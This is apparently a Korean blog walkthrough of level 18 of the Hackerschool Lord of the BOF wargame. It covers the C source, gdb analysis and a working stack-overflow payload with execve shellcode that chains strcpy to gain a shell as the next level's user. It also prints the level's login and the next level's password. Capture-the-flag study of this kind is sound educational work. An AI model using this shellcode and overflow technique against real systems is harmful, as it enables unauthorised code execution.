[해커스쿨 LOB] Level18: Succubus >> Nightmare
·2020. 8. 30. 20:00
Level 18. Succubus >> Nightmare
Theme: PLT
id : succubus
pw : here to stay
bash2 & 코드 확인
[succubus@localhost succubus]$ bash2
[succubus@localhost succubus]$ cat nightmare.c
The Lord of the BOF : The Fellowship of the BOF
- nightmare
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
main(int argc, char *argv[])
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
// check address
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall
memset(buffer+40+8, 'A', 4);
1. 매개변수 최소 1개 넘겨주기 (argv error)
2. ret부분은 무조건 strcpy의 주소 (you must fall in love with strcpy())
3. ret+4부분 4바이트는 AAAA로 초기화(dangerous waterfall)
3번이 있는 이유는 RTL chaining을 방지하기 위함인 것 같네요. 이 문제는 strcpy함수를 이용하여 ret+4, 즉 strcpy()의 리턴 주소를 buffer로 바꿀겁니다. 그럼 payload는 다음과 같이 설계할 수 있습니다.
shellcode 주소[4] + shellcode[25] + dummy[15] + strcpy주소[4] + dummy[4] + (buffer+48)주소[4] + (buffer)주소[4]
strcpy의 원형은 char* strcpy(char* dest, const char* origin)이므로 위와 같이 payload를 설계하였다.
그럼 구할건
1. shellcode주소
2. shellcode
3. strcpy주소
4. buffer/buffer+48주소
2. shellcode
3. strcpy주소
(gdb) disas main
0x804871b <main+103>: mov (%eax),%edx
0x804871d <main+105>: push %edx
0x804871e <main+106>: lea 0xffffffd8(%ebp),%eax
0x8048721 <main+109>: push %eax
0x8048722 <main+110>: call 0x8048410 <strcpy>
0x8048727 <main+115>: add $0x8,%esp
0x804872a <main+118>: lea 0xffffffd8(%ebp),%eax
0x804872d <main+121>: push %eax
0x804872e <main+122>: push $0x8048825
0x8048733 <main+127>: call 0x80483e0 <printf>
main을 분석하면 알 수 있죠.
strcpy주소: 0x8048410
1. shellcode주소 / 4. buffer/buffer+48주소
(gdb) r `python -c 'print "\xbf\xbf\xbf\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*15+"\x10\x84\x04\x08"+"AAAA"+"\xbf\xbf\xbf\xbf"+"\xff\xff\xff\xff"'`
Starting program: /home/succubus/nightmarl `python -c 'print "\xbf\xbf\xbf\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*15+"\x10\x84\x04\x08"+"AAAA"+"\xbf\xbf\xbf\xbf"+"\xff\xff\xff\xff"'`
Breakpoint 2, 0x8048727 in main ()
(gdb) x/100x $esp
0xbffffa94: 0xbffffaa0 0xbffffc2c 0x08048410 0xbfbfbfbf
0xbffffaa4: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xbffffab4: 0x89e18953 0xcd0bb0c2 0x90909080 0x90909090
0xbffffac4: 0x90909090 0x90909090 0x08048410 0x41414141
0xbffffad4: 0xbfbfbfbf 0xbffffb00 0x40013868 0x00000002
0xbffffae4: 0x08048420 0x00000000 0x08048441 0x080486b4
0xbffffaf4: 0x00000002 0xbffffb14 0x08048350 0x0804877c
여태껏 구한걸 가지고 gdb로 분석해보았습니다. 보아하니 shellcode의 주소는 0xbffffaa4, buffer의 시작주소는 0xbffffaa0, buffer+48의 주소는 0xbffffad0이네요. payload를 보내봅시다.
`python -c 'print "\xa4\xfa\xff\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*15+"\x10\x84\x04\x08"+"AAAA"+"\xd0\xfa\xff\xbf"+"\xa0\xfa\xff\xbf"'`
[succubus@localhost succubus]$ ./nightmarl `python -c 'print "\xa4\xfa\xff\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*15+"\x10\x84\x04\x08"+"AAAA"+"\xd0\xfa\xff\xbf"+"\xa0\xfa\xff\xbf"'`
Segmentation fault (core dumped)
(gdb) x/100x $esp-0x100
0xbffffa74: 0x08049874 0x08048273 0x4001f7f0 0xbffffad8
0xbffffa84: 0x4000a970 0xbffffae0 0x00000400 0x4000ae60
0xbffffa94: 0xbffffb24 0xbffffad8 0x0804874b 0xbffffae0
0xbffffaa4: 0x00000041 0x00000004 0x08048410 0xbffffaa4
0xbffffab4: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xbffffac4: 0x89e18953 0xcd0bb0c2 0x90909080 0xbffffae0
0xbffffad4: 0x90900041 0x4000ae60 0x90909090 0x41414141 //here!
0xbffffae4: 0xbffffad0 0xbffffaa0 0x40013800 0x00000002
0xbffffaf4: 0x08048420 0x00000000 0x08048441 0x080486b4
0xbffffb04: 0x00000002 0xbffffb24 0x08048350 0x0804877c
0xbffffb14: 0x4000ae60 0xbffffb1c 0x40013e90 0x00000002
0xbffffb24: 0xbffffc1b 0xbffffc27 0x00000000 0xbffffc64
0xbffffb34: 0xbffffc77 0xbffffc90 0xbffffcaf 0xbffffcd1
0xbffffb44: 0xbffffcdf 0xbffffea2 0xbffffec1 0xbffffedf
buffer+48의 주소는 0xbffffae0, buffer의 주소는 0xbffffab0, shellcode의 주소는 0xbffffab4로 밀렸네요.
[succubus@localhost succubus]$ ./nightmare `python -c 'print "\xb4\xfa\xff\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*15+"\x10\x84\x04\x08"+"AAAA"+"\xe0\xfa\xff\xbf"+"\xb0\xfa\xff\xbf"'`
bash$ id
uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)
bash$ my-pass
euid = 518
beg for me
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